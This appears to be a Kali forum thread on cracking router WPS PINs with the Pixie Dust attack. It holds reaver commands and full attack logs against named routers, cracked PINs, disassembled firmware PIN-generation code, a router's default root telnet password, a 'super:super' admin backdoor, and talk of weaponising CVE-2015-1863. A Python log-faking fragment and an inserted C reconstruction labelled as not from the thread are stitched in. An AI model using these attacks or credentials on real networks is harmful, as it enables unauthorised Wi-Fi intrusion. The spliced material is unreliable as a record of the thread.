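    "[P] E-Nonce: " + reaver_style(fake_bytes(16, 1)),
    "[P] PKE: " + reaver_style(fake_bytes(192, 2)),
    "[P] WPS Manufacturer: ExampleCorp",
    "[P] WPS Model Number: 1.0",
    "[+] Received M1 message",
    "[P] PKR: " + reaver_style(fake_bytes(192, 3)),
    "[P] AuthKey: " + reaver_style(fake_bytes(32, 4)),
    "[+] Sending M2 message",
    "[P] E-Hash1: " + reaver_style(fake_bytes(32, 5)),
    "[P] E-Hash2: " + reaver_style(fake_bytes(32, 6)),
    "[Pixie-Dust] [+] WPS pin: 12345670",
    "",
    "[P] E-Nonce: " + reaver_style(fake_bytes(16, 7)),   # second attempt: AP locks up
    "[P] PKE: " + reaver_style(fake_bytes(192, 8)),
    "[P] WPS Manufacturer: ExampleCorp",
    "[+] Received M1 message",
    "[P] PKR: " + reaver_style(fake_bytes(100, 9)),      # truncated line, no M3 follows
    "[Pixie-Dust] [-] WPS pin not found!",
])

if __name__ == "__main__":
    for i, ex in enumerate(parse_reaver_log(SAMPLE_LOG), 1):
        print(i, ex.values.get("WPS Manufacturer"),
              "complete" if ex.complete() else "incomplete", ex.pin, ex.errors)
```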

datahead
2015-04-27, 04:38
I do have a fork of autopixiewps I modified a while back that does hash collection and then also produces a shell script. I'll update my fork in my GitHub repo (GitHub user name: d8tahead).

It saves generic reaver output of model info, collects hashes, and produces a shell script for the corresponding hashes with pixiewps, and gives each segment an ID#.

edit:
The one in my repo is a little old, I'll update it soon

will post asap

Edit #2:

I had stripped out some things from the code, but it should still work fine :)

autopixie has been updated in my repo:
https://github.com/d8tahead/AutoPixieWps

and you will need the new reaver t6x fork ( i added addition of R-Nonce for future pixiewps ) :
https://github.com/t6x/reaver-wps-fork-t6x

For my fork of autopixiewps for the hash gathering, you will need to enable option #5 on the main menu before the wash scan (pixiehash gathering mode).

Also please note that the logs will be saved as ESSID and BSSID with the prefix PixieHash in the executing directory!
So be sure to cd to whichever directory you would like the hashes to be saved in if executing from a shell.

Remember to make autopixiewps.py executable!

aboulatif
2015-04-27, 15:25
After your last update reaver doesn't work: pixiewps: invalid option -- 'm'

Saydamination
2015-04-27, 17:50
ISSUE: ??

I looked at all the pixie test posts in this thread... Some modems are invulnerable because the manufacturer and WPS model numbers are FALSE!

Example:

WPS Manufacturer: TPLINK
WPS Model Number: 1

TP-LINK uses Realtek and Atheros chipsets...

True value:

WPS Manufacturer: Atheros
WPS Model Number: WR740..

Other example:

WPS Manufacturer: Realtek Semiconductor,
WPS Model Number: EV-2006-07-27...

The model number is not "EV-2006-07-27"; the true value is RTL8671

popthattif
2015-04-27, 18:49
Can someone please tell me how to make reaver delay between sending M1 and M2?

soxrok2212
2015-04-27, 19:04
ISSUE: ??

I looked at all the pixie test posts in this thread... Some modems are invulnerable because the manufacturer and WPS model numbers are FALSE!

Example:

WPS Manufacturer: TPLINK
WPS Model Number: 1

TP-LINK uses Realtek and Atheros chipsets...

True value:

WPS Manufacturer: Atheros
WPS Model Number: WR740..

Other example:

WPS Manufacturer: Realtek Semiconductor,
WPS Model Number: EV-2006-07-27...

The model number is not "EV-2006-07-27"; the true value is RTL8671

It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.

Frost.Elrick
2015-04-27, 20:17
Dependencies
[code]
sudo apt-get install libssl-dev
sudo apt-get install libpcap-dev
sudo apt-get install libsqlite3-dev
[/code]

Couldn't get libssl-dev; it's forbidden in the repository as Kali is unable to update.
I'm running the latest live version but still can get the package.
Pixie is unable to install without SSL.
Help me...

soxrok2212
2015-04-27, 21:19
I confirm it's working on Technicolor TD5130 v2... :

..But not on TD5130 v1 :


wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from 00:18:E7:XX:XX:XX
[+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[P] WPS Manufacturer: Technicolor
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1209A1D12783
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s

So we're waiting for a new update of Pixie, and I hope it'll be very soon...

Try this PIN: 76757891

nuroo
2015-04-27, 21:29
What fixes, improvements will pixiewps 1.1 bring?

soxrok2212
2015-04-27, 21:36
What fixes, improvements will pixiewps 1.1 bring?

Full Realtek PRNG brute force, AuthKey computation if you don't want to use the modified reaver, and it's a bit more user-friendly :D

Laserman75
2015-04-27, 21:53
After your last update reaver doesn't work: pixiewps: invalid option -- 'm'

I have the same problem.
What's wrong?

unsuns06
2015-04-27, 21:56
How did you get this PIN ?

I will try it later this week because I'm travelling right now.

Thank you.

nuroo
2015-04-27, 22:17
Sounds good. Great work everybody involved.

Got my first Belkin today. The first pin generated was the correct one.

soxrok2212
2015-04-27, 22:25
With pixie dust or the pin generator? Model number?

nuroo
2015-04-27, 22:42
with the -W1 option. :o

Saydamination
2015-04-28, 08:24
It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.

Hi, soxrok... I see the APs in Wireshark... And there is a problem... Pixie sees wrong values. Look at the screenshots:


Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] WPS Manufacturer: AirTies Wireless Networks
[P] WPS Model Number: 1.0.2.0
[P] Access Point Serial Number: AT1731434014674
[+] Received M1 message
[+] Sending M2 message
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 2 s
[Pixie-Dust]


http://imgur.com/XslVDB6


Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[+] Sending M2 message
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 2 s
[Pixie-Dust]


http://imgur.com/fnrrZUn



Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] WPS Manufacturer: ZyXEL
[P] WPS Model Number: P-660W-T1 v3
[P] Access Point Serial Number: 00000001
[+] Received M1 message
[+] Sending M2 message
[P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b :8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b
[P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9 :47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s
[Pixie-Dust]


http://imgur.com/1MrIW4K



Trying pin 12345670.
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4
[P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68 :dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a 6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0: 01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70 :bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b 5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39: d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3 :f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:8 8:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3: 81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09 :68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8 e:b5:ea:f8:81:f4:74:d9:fc
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 1.0
[P] Access Point Serial Number: 14CC200000*
[+] Received M1 message
[P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a :07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:0 2:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53: fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6 :b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:1 2:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a: 5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81 :5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:b a:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd: 02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e :8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:4 8:d6:39:97:68:4f:fb:28:bc
[P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e :3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0
[+] Sending M2 message
[P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a :52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc
[P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51 :40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 2 s
[Pixie-Dust]




AND this AP is VULNERABLE, pixiewps sees true values



Trying pin 12345670.
.............................
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] PKR: ................
e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04: b9:80
[P] AuthKey:
[+] Sending M2 message
[P] E-Hash1:
[P] E-Hash2:
[Pixie-Dust]
[Pixie-Dust] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5
[Pixie-Dust] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae
[Pixie-Dust] [+] WPS pin: 71632285
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]


http://imgur.com/zlmrfjO

I think this is the problem, so Pixie is not vulnerable on Realtek, Broadcom and Atheros chipsets ....

I don't know, but probably

kcdtv
2015-04-28, 11:38
hello
Hold on a second my friend: this thread is to speak about the pixie dust attack "theoretically", not for reporting bugs using modified reaver (you have another thread for that)

"Pixie sees wrong values."
pixiewps (you have another thread to speak about it) does not "see" any value,
Either you enter the value manually, or you use a script, or you are using the automated reaver (that is the case)...
I suggest you post in the correct thread: Reaver modfication for Pixie Dust Attack (https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack)
cheers

unsuns06
2015-04-28, 16:45
Try this PIN: 76757891

IT'S THE 3RD TIME I'VE TRIED TO POST A REPLY, I hope this ONE WILL BE PUBLISHED.

How did you get this PIN ?

I'll try it later this week, because I'm travelling right now.

When will the new update of pixie be released ?

Many thanks.

nuroo
2015-04-28, 16:52
When it's ready. I was told very soon. Kept checking back here. Or you could follow the github

soxrok2212
2015-04-28, 17:18
IT'S THE 3RD TIME I'VE TRIED TO POST A REPLY, I hope this ONE WILL BE PUBLISHED.

How did you get this PIN ?

I'll try it later this week, because I'm travelling right now.

When will the new update of pixie be released ?

Many thanks.

Beta tool :)

aanarchyy
2015-04-28, 18:18
Beta tool :)

Will said beta tool ever be released? I wanna play too ;)
Or maybe even an email?

Saydamination
2015-04-28, 18:23
hello
Hold on a second my friend: this thread is to speak about the pixie dust attack "theoretically", not for reporting bugs using modified reaver (you have another thread for that)

pixiewps (you have another thread to speak about it) does not "see" any value,
Either you enter the value manually, or you use a script, or you are using the automated reaver (that is the case)...
I suggest you post in the correct thread: Reaver modfication for Pixie Dust Attack (https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack)
cheers

Thanks @kcdtv ..

I will do it... :)

soxrok2212
2015-04-28, 18:26
Will said beta tool ever be released? I wanna play too ;)
Or maybe even an email?

Yeah probably this week. We're just testing to make sure it works and ironing out bugs if we find any. Kudos to Wiire!!! He's an awesome dev :)

nuroo
2015-04-28, 18:54
I can beta also

someone_else
2015-04-28, 19:39
3.
Do you know how to "disassemble" firmware? I am stuck and need some help, I found something very interesting on unsupported Realtek in parts that can be disassembled easily with binwalk from Craig Heffner.
Basically there is a little *.sh script on startup that generates 4 things (or checks if these four things have been generated correctly and generates them if that is not the case) and one of them is the default WPS PIN.
On these devices the PIN is permanent/unconfigurable.
Help would be appreciated

Hi,
Got the firmware, unpacked it with fmk, checked it with IDA Pro.
Found this function in wscd (it's the "gen-pin" function from the .sh script), but I'm not that good at MIPS; the (in my opinion) important parts are marked, maybe someone who's familiar with MIPS can tell us something about it.



LOAD:0040C4C4 la $t9, gettimeofday
LOAD:0040C4C8 move $a1, $zero
LOAD:0040C4CC jalr $t9 ; gettimeofday
LOAD:0040C4D0 addiu $a0, $sp, 0xF0+var_68
LOAD:0040C4D4 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4D8 lw $a0, 0xF0+var_68($sp)
LOAD:0040C4DC la $t9, srand
LOAD:0040C4E0 nop
LOAD:0040C4E4 jalr $t9 ; srand
LOAD:0040C4E8 nop
LOAD:0040C4EC lw $gp, 0xF0+var_D8($sp)
LOAD:0040C4F0 nop
LOAD:0040C4F4 la $t9, rand
LOAD:0040C4F8 nop
LOAD:0040C4FC jalr $t9 ; rand
LOAD:0040C500 nop
LOAD:0040C504 li $v1, 0x6B5FCA6B
LOAD:0040C50C mult $v0, $v1
LOAD:0040C510 sra $a0, $v0, 31
LOAD:0040C514 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C518 nop
LOAD:0040C51C la $t9, 0x400000
LOAD:0040C520 nop
LOAD:0040C524 addiu $t9, (sub_404128 - 0x400000)
LOAD:0040C528 mfhi $v1
LOAD:0040C52C sra $v1, 22
LOAD:0040C530 subu $a1, $v1, $a0
LOAD:0040C534 sll $a0, $a1, 5
LOAD:0040C538 subu $a0, $a1
LOAD:0040C53C sll $v1, $a0, 6
LOAD:0040C540 subu $v1, $a0
LOAD:0040C544 sll $v1, 3
LOAD:0040C548 addu $v1, $a1
LOAD:0040C54C sll $a0, $v1, 2
LOAD:0040C550 addu $v1, $a0
LOAD:0040C554 sll $v1, 7
LOAD:0040C558 subu $a1, $v0, $v1
LOAD:0040C55C sll $s0, $a1, 2
LOAD:0040C560 move $a0, $a1
LOAD:0040C564 jalr $t9 ; sub_404128
LOAD:0040C568 addu $s0, $a1
LOAD:0040C56C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C570 sll $s0, 1
LOAD:0040C574 addu $a0, $s0, $v0
LOAD:0040C578 la $t9, 0x400000
LOAD:0040C57C nop
LOAD:0040C580 addiu $t9, (sub_403F60 - 0x400000)
LOAD:0040C584 jalr $t9 ; sub_403F60
LOAD:0040C588 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C58C lw $gp, 0xF0+var_D8($sp)
LOAD:0040C590 addiu $a1, $sp, 0xF0+var_D0
LOAD:0040C594 la $a0, 0x440000
LOAD:0040C598 la $t9, printf
LOAD:0040C59C nop
LOAD:0040C5A0 jalr $t9 ; printf
LOAD:0040C5A4 addiu $a0, (aPinS - 0x440000) # "PIN: %s\n"
LOAD:0040C5A8 lw $gp, 0xF0+var_D8($sp)
LOAD:0040C5AC li $a0, 0xADAC
LOAD:0040C5B0 addu $a0, $s2, $a0
LOAD:0040C5B4 la $t9, strcpy
LOAD:0040C5B8 b loc_40C8C0
LOAD:0040C5BC addiu $a1, $sp, 0xF0+var_D0
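
Reading the arithmetic of that listing back into C, as an added example (not firmware code and not from the thread): the constant 0x6B5FCA6B with mfhi / sra 22 is the compiler's reciprocal multiply for division by 10^7, the sll/subu/addu chain rebuilds q * 10^7, so $a1 ends up as rand() % 10000000, and the value is then scaled by 10 and a digit appended. That sub_404128 is the standard WPS checksum and sub_403F60 the number-to-string conversion is an assumption here; the seed (gettimeofday() seconds) is not reproduced, constructed sample values stand in for rand().

```c
#include <stdint.h>
#include <stdio.h>

/* li $v1,0x6B5FCA6B / mult / mfhi / sra $v1,22 / sra $a0,$v0,31 / subu:
 * signed division of v by 10^7; 0x6B5FCA6B is ceil(2^54 / 10^7). */
int32_t div_1e7_via_magic(int32_t v)
{
    int64_t prod = (int64_t)v * (int64_t)0x6B5FCA6B;
    int32_t hi = (int32_t)(prod >> 32);   /* mfhi: upper 32 bits of the product */
    return (hi >> 22) - (v >> 31);        /* sra 22, then undo the sign-bit bias */
}

/* sll/subu/addu chain at 0040C534..0040C554: q * 10^7 without a multiply. */
int32_t mul_1e7_via_shifts(int32_t q)
{
    int32_t a0 = (q << 5) - q;            /* 31q */
    int32_t v1 = (a0 << 6) - a0;          /* 1953q */
    v1 = (v1 << 3) + q;                   /* 15625q */
    v1 = v1 + (v1 << 2);                  /* 78125q */
    return v1 << 7;                       /* 10000000q */
}

/* Standard WPS PIN checksum digit over the 7 leading digits; assumed to be
 * what sub_404128 computes ($a0 = the 7-digit value at the call). */
int wps_checksum(uint32_t pin7)
{
    uint32_t accum = 0;
    while (pin7) {
        accum += 3 * (pin7 % 10); pin7 /= 10;
        accum += pin7 % 10;       pin7 /= 10;
    }
    return (int)((10 - accum % 10) % 10);
}

/* Everything after the rand() call: $a1 = r % 10^7,
 * $s0 = ((a1 << 2) + a1) << 1 = 10 * a1, $a0 = $s0 + checksum = 8-digit PIN. */
uint32_t pin_from_rand_value(int32_t r)
{
    int32_t pin7 = r - mul_1e7_via_shifts(div_1e7_via_magic(r));   /* r % 10000000 */
    return (uint32_t)pin7 * 10u + (uint32_t)wps_checksum((uint32_t)pin7);
}

int main(void)
{
    /* Constructed stand-ins for rand() output. In the firmware rand() is seeded
     * with the clock at first boot, which is why the thread ties the PIN to build time. */
    int32_t samples[3] = { 1234567, 27163228, 2147483647 };
    for (int i = 0; i < 3; i++) {
        int32_t r = samples[i];
        /* cross-check both compiler idioms against plain C arithmetic */
        if (div_1e7_via_magic(r) != r / 10000000 ||
            mul_1e7_via_shifts(r / 10000000) != (r / 10000000) * 10000000)
            return 1;
        printf("rand()=%10d -> PIN: %08lu\n", r, (unsigned long)pin_from_rand_value(r));
    }
    return 0;
}
```

The second sample yields 71632285, the PIN reaver reports further up this thread, which shows the checksum digit is fully determined by the first seven.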

kcdtv
2015-04-28, 21:44
WoW
Thank you SO MUCH someone else (I mean you, not someone else)
It is much more "readable" than what I got. ;)
I am not used to MIPS either (my poor skills in disassembling speak for themselves :P)
I will try with the tool you used, I am curious about LOAD:0040C8C0 / and checking sub_404128 / sub_403F60
The very last line you underline is definitely like a simple "printf" that outputs the value of the PIN to stdout

SO GREAT! ;)
First, thanks to you, we know 100% sure that build time is the string used with some randomization.
The startup.sh script was giving a strong clue: time was "generated" just before the PIN....
Another clue: we already know that time is used as a seed for the Diffie-Hellman key exchange.
Now we know: time is definitely and surely used to generate the default PIN
And it is the first build time.

That's kind of an issue if we look for a way to generate the exact default PIN... depending on the randomization, but it looks like this with the devices I saw; we might be able to guess the first digits correctly relating to the year of production,,,, then the PIN respects the checksum so the seconds start on 7 digits
One hour is 3600 seconds and we would need to be within about 15 minutes more or less of the exact build time to get the first half of the PIN... sorry for my English, but I guess you see what I mean...
But a little pixie flying around told me that this kind of "unsupported Realtek" would, maybe, who knows?, not be unsupported anymore for so long....
Thanks so much for the information, it is helping a lot................. ;)

aanarchyy
2015-04-29, 01:20
DOH! How did I forget about fmk, but the last time I used it was when I was taking part in "jailbreaking" the neotv 300b. Looks like I've got some playing to do :-D

reversetheg@p
2015-04-29, 03:10
1.
The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
In the case that the chipset and/or the model-manufacturer doesn't appear fully/directly in the probes/stdout of modified reaver, please add this information manually

2.
They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

3.
Do you know how to "disassemble" firmware? I am stuck and need some help, I found something very interesting on unsupported Realtek in parts that can be disassembled easily with binwalk from Craig Heffner.
Basically there is a little *.sh script on startup that generates 4 things (or checks if these four things have been generated correctly and generates them if that is not the case) and one of them is the default WPS PIN.
On these devices the PIN is permanent/unconfigurable http://pix.toile-libre.org/upload/original/1430055858.png
Help would be appreciated

Hello kcdtv,

I have the same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1, just to tell you that you can change this "permanent" WPS pin, and not only that but also the mac address. There are 2 ways to do it:
- you can issue commands over telnet 192.168.2.1 23, login as root and 5up as pass
- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp

Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled in the source code :rolleyes: ); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device

With wscd -gen-pin you can generate pins randomly, but there's another command tool named flash (like nvram) that stores values permanently over reboots:

// get WPS pin
# flash get wlan0 HW_WSC_PIN
HW_WSC_PIN="77756886"

// generate a "random" WPS pin
# flash -gen-pin

// save a new pin manually for instance 88884444 (reboot afterwards to take effect)
# flash set wlan0 HW_WSC_PIN 88884444

// change mac address permanently on wlan0
# flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014

// change mac address temporarily (until reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
# ifconfig wlan0 hw ether 00c0ca111111

About that pin generator -gen-pin I did find stuff in some extracted files from the firmware, but I missed some stuff that I need to extract again because it was long ago, and over telnet I saw more info.

Did you have a look at the source code over this web page http://192.168.2.1/wlwps.asp?
There's a function genPinClicked() maybe it will help to look it up.

Congrats everyone for your efforts

kcdtv
2015-04-29, 17:08
WoW && WoW
Like someone else you are amazing too :D
That's actually one of the most exciting threads, full of amazing people, you guys rule! :cool:

- you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
YES!
You don't know how much I was looking for that!
'cause I noticed telnet is enabled even though there is no way to enable / or disable it / or configure it (from the web interface with the proposed options)
But I couldn't log in.
Now I can :cool: thank you SO MUCH that's awesome
By the way, did you notice this permanent "super" backdoor?
With credentials super:super you can log in with administrator privileges. (but not in telnet)
http://pix.toile-libre.org/upload/original/1430310175.jpg

- you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp
I get a 404 error when I try to access this web page or if I try to execute a command through a POST request (but I am not used to this at all so maybe I am doing something wrong)
I also use version v3.2.0.2.6, different from yours. I should downgrade to check all these very interesting and fundamental elements that you bring to us.
Thanks for showing us and explaining to us all this system around PIN management (and so much more, this is tremendous information)

someone_else
2015-04-29, 21:59
@ kcdv
I'm glad that I could help :o and I'm with you: great thread!

And a little update :

VULNERABLE:

Edimax
Fonera Fon 2.0n (FON 2303B)
Ralink RT 3052


[P] E-Nonce: 72:a5:2f:83:81:21:32:85:04:2c:30:60:d8:cf:ab:9e
[P] PKE: 6a:b2:23:7b:37:81:58:2c:f6:a1:0c:f9:a8:ec:4c:14:70 :dc:0b:70:a1:cb:1e:dc:0a:22:17:2d:b0:83:c4:bc:3a:4 7:b7:39:a9:63:ea:57:ff:38:ba:61:6d:2f:f7:45:96:45: 80:70:1d:cf:27:1f:8a:84:52:77:e0:5c:e9:c1:72:9d:e7 :8a:20:70:aa:29:e3:3d:ea:01:c5:34:c9:70:64:e3:72:c 7:9a:08:b5:86:61:32:a0:7d:80:b6:e1:9c:5c:57:ab:90: 4b:f5:24:50:cb:3e:31:e3:6e:d0:f9:a2:67:ab:69:71:07 :9d:35:fc:97:0d:25:fa:2f:a3:d2:be:ae:eb:a2:34:9e:e 5:f6:92:27:80:88:0b:fc:24:ee:b3:47:e9:35:17:a1:f5: c2:72:58:44:e6:cd:49:05:4a:2a:23:26:a3:99:8d:ae:54 :bd:a7:c0:7c:3a:52:28:fc:58:a6:2b:aa:dc:b5:88:4d:b 9:4f:04:41:98:82:25:2a:0a
[P] PKR: 5d:8e:b8:d7:5d:71:79:d3:c1:d5:b1:72:b4:d0:8d:85:f0 :5c:13:5f:1e:8c:35:fb:83:2e:15:9a:c9:ed:0f:bf:45:4 8:93:77:38:2f:90:4a:4c:53:ae:4b:ee:18:4d:cc:d8:98: d8:6c:98:b2:3f:45:fe:0c:52:1b:69:75:b4:85:d0:44:1e :ca:ad:8c:57:b6:a5:13:72:5a:8b:0d:38:1a:50:21:24:7 1:14:7d:13:72:65:92:53:1c:de:f3:a9:03:c5:ba:65:ff: 64:c8:ac:84:00:7b:c9:8b:03:61:6c:9b:39:56:4d:3a:27 :a8:66:de:79:99:a2:ab:82:9c:e2:98:53:61:ba:8d:d3:9 b:47:4e:d3:ff:f1:8d:e0:61:39:f6:9f:35:a2:2f:23:c4: ed:af:da:a0:77:bc:b2:db:36:21:8c:9d:14:27:96:61:22 :89:37:33:09:fa:2b:1f:f0:99:9e:ea:e8:59:ad:bc:8d:d 9:75:0a:db:c9:f9:43:ba:83
[P] AuthKey: 54:76:bd:c3:63:02:b2:fe:02:dd:fb:2e:db:e5:3d:2f:0f :4e:a9:e2:bc:cb:fb:d6:58:a9:47:c8:ea:56:99:34
[P] E-Hash1: 08:80:1e:79:8c:5f:27:fb:09:d3:35:cb:e3:59:67:c2:c6 :48:4b:d3:0f:5a:cc:42:05:c9:80:e9:83:36:ea:c2
[P] E-Hash2: 6c:b5:bb:78:81:8d:c1:41:af:c0:32:91:8a:b6:13:64:fe :39:26:b6:76:85:ad:e7:37:d9:cc:7e:d2:c1:db:41

soxrok2212
2015-04-30, 00:21
@kcdtv pointed out a newly documented "flaw" I guess i would call it: http://w1.fi/security/2015-1/wpa_supplicant-p2p-ssid-overflow.txt
It was something I was actually considering a few days ago, but I guess people beat me to it :P
Anyways, it looks like this may be a gateway into a bunch more information... potentially information dumps, router reboots, memory leaks, the list goes on and on. I personally don't know how to implement it. There is an option in mdk3 that does something similar, but it doesn't work for these purposes... maybe it can be modified? If you run mdk3 --fullhelp I think the command is p but I don't recall.

If you don't want to click the link, it is just a text document:

wpa_supplicant P2P SSID processing vulnerability

Published: April 22, 2015
Identifier: CVE-2015-1863
Latest version available from: http://w1.fi/security/2015-1/


Vulnerability

A vulnerability was found in how wpa_supplicant uses SSID information
parsed from management frames that create or update P2P peer entries
(e.g., Probe Response frame or number of P2P Public Action frames). SSID
field has valid length range of 0-32 octets. However, it is transmitted
in an element that has a 8-bit length field and potential maximum
payload length of 255 octets. wpa_supplicant was not sufficiently
verifying the payload length on one of the code paths using the SSID
received from a peer device.

This can result in copying arbitrary data from an attacker to a fixed
length buffer of 32 bytes (i.e., a possible overflow of up to 223
bytes). The SSID buffer is within struct p2p_device that is allocated
from heap. The overflow can override couple of variables in the struct,
including a pointer that gets freed. In addition about 150 bytes (the
exact length depending on architecture) can be written beyond the end of
the heap allocation.

This could result in corrupted state in heap, unexpected program
behavior due to corrupted P2P peer device information, denial of service
due to wpa_supplicant process crash, exposure of memory contents during
GO Negotiation, and potentially arbitrary code execution.

Vulnerable versions/configurations

wpa_supplicant v1.0-v2.4 with CONFIG_P2P build option enabled

Attacker (or a system controlled by the attacker) needs to be within
radio range of the vulnerable system to send a suitably constructed
management frame that triggers a P2P peer device information to be
created or updated.

The vulnerability is easiest to exploit while the device has started an
active P2P operation (e.g., has ongoing P2P_FIND or P2P_LISTEN control
interface command in progress). However, it may be possible, though
significantly more difficult, to trigger this even without any active
P2P operation in progress.


Acknowledgments

Thanks to Google security team for reporting this issue and smart
hardware research group of Alibaba security team for discovering it.


Possible mitigation steps

- Merge the following commits to wpa_supplicant and rebuild it:

P2P: Validate SSID element length before copying it (CVE-2015-1863)

This patch is available from http://w1.fi/security/2015-1/

- Update to wpa_supplicant v2.5 or newer, once available

- Disable P2P (control interface command "P2P_SET disabled 1" or
"p2p_disabled=1" in (each, if multiple interfaces used) wpa_supplicant
configuration file)

- Disable P2P from the build (remove CONFIG_P2P=y)


That text is not mine, it comes verbatim from the link I posted above. I take no credit and do not mean to infringe any copyrights or screw with any legal stuff that I don't know about.

Anyways, I guess SSID information comes from management frames, which are unencrypted packets.... check it out here: http://www.wi-fiplanet.com/tutorials/article.php/1447501 They can't be encrypted because they "establish and maintain connections" (quoted from Wi-Fi Planet), making it a whole lot easier for attackers. There is no encryption to break so it should be a fairly straightforward process :D

